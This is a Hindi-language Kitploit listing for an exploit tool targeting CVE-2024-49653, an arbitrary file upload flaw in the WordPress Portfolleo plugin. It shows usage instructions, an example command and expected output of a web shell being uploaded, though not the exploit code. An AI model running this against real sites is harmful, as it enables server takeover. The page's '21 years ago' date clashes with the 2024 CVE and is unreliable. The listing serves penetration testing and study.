Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-49653 — WordPress Portfolleo प्लगइन <= 1.2 - मनमानी फ़ाइल अपलोड कमज़ोरी | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2024-49653
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubnxploited/cve-2024-49653

CVE-2024-49653

WordPress Portfolleo प्लगइन <= 1.2 - मनमानी फ़ाइल अपलोड कमज़ोरी

रिपॉजिटरी देखें
21 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

📜 WordPress Portfolleo प्लगिन एक्सप्लॉइट (CVE-2024-49653)

🚨 भेद्यता विवरण

शीर्षक: WordPress Portfolleo प्लगिन <= 1.2 - मनमाना फ़ाइल अपलोड भेद्यता

विवरण:
James Eggers के Portfolleo पोर्टफोलियो में खतरनाक प्रकार की फ़ाइल के असीमित अपलोड की भेद्यता वेब सर्वर पर एक वेब शेल अपलोड करने की अनुमति देती है। यह समस्या Portfolleo के संस्करण n/a से 1.2 तक प्रभावित करती है।

और जानें:

  • CWE-434: CWE-434 फ़ाइल के खतरनाक प्रकार का असीमित अपलोड

CVSS स्कोर:

  • स्कोर: 9.9
  • गंभीरता: CRITICAL
  • संस्करण: 3.1
  • वेक्टर स्ट्रिंग: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

📋 उपयोगकर्ता गाइड

🚀 स्क्रिप्ट उपयोग

यह स्क्रिप्ट WordPress Portfolleo प्लगिन (संस्करण <= 1.2) में मनमाना फ़ाइल अपलोड भेद्यता का शोषण करके एक वेब शेल अपलोड करती है।

📦 आवश्यकताएँ

स्क्रिप्ट चलाने के लिए आपके पास निम्नलिखित स्थापित होने चाहिए:

  • Python 3
  • requests लाइब्रेरी
  • beautifulsoup4 लाइब्रेरी

आप आवश्यक लाइब्रेरीज़ को निम्न का उपयोग करके इंस्टॉल कर सकते हैं:

pip install requests beautifulsoup4

🛠️ उपयोग

स्क्रिप्ट को निम्नलिखित विकल्पों के साथ चलाएँ:


CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD

WordPress Portfolleo plugin <= 1.2 - Arbitrary File Upload vulnerability # by Khaled Alenazi

options:
  -h, --help            show this help message and exit
  -u, --url URL         Base URL of the site (e.g. http://target/wordpress)
  -U, --username USERNAME
                        WordPress username
  -p, --password PASSWORD
                        WordPress password

📝 उदाहरण

 
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123

📊 अपेक्षित आउटपुट

यदि स्क्रिप्ट सफलतापूर्वक चलती है, तो आपको निम्नलिखित आउटपुट दिखाई देना चाहिए:

[+] Logged in successfully.
[+] Extracted _wpnonce: e5f7ffa134
[+] Shell has been uploaded.
[*] Check the shell here: http://target.com/wp-content/portfolleo/nxploit.php

⚠️ अस्वीकरण

यह स्क्रिप्ट केवल शैक्षिक उद्देश्यों के लिए है। लेखक इस स्क्रिप्ट का अवैध गतिविधियों के लिए उपयोग का समर्थन नहीं करता है। इसका जिम्मेदारी से उपयोग करें और केवल उन प्रणालियों पर जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति है।

द्वारा: Nxploited | Khaled Alenazi

टूल डाउनलोड करें